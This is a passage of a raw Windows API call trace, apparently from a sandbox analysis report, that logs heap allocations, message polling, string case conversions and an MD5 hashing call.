hHeap=0x25c0000) returned 1 [0261.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0261.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.263] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.263] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0261.264] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0261.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0261.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0261.264] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0261.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0261.264] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0261.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0261.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0261.265] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.265] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0261.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0261.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0261.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0261.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0261.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0261.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.266] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.267] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.267] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0261.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.267] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0261.267] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0261.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0261.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0261.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.268] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.268] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0261.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0261.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.269] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.269] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.269] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.269] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.270] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.270] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.270] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.271] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.271] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.271] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0261.271] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.271] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0261.271] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.271] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.271] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.271] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0261.272] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.272] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.272] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.272] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.272] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0261.272] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.272] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.272] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.272] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.272] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.272] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.272] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.273] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.273] CryptHashData (hHash=0xaa59a0, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0261.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0261.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0261.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0261.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0261.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0261.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0261.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0261.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0261.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0261.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0261.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0261.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0261.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0261.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0261.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0261.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0261.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0261.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0261.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0261.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0261.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0261.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0261.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0261.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0261.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0261.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0261.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0261.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0261.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0261.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0261.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0261.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0261.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0261.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0261.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0261.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0261.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0261.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0261.278] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0261.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0261.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0261.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0261.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0261.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0261.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0261.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0261.279] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0261.280] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0261.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0261.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 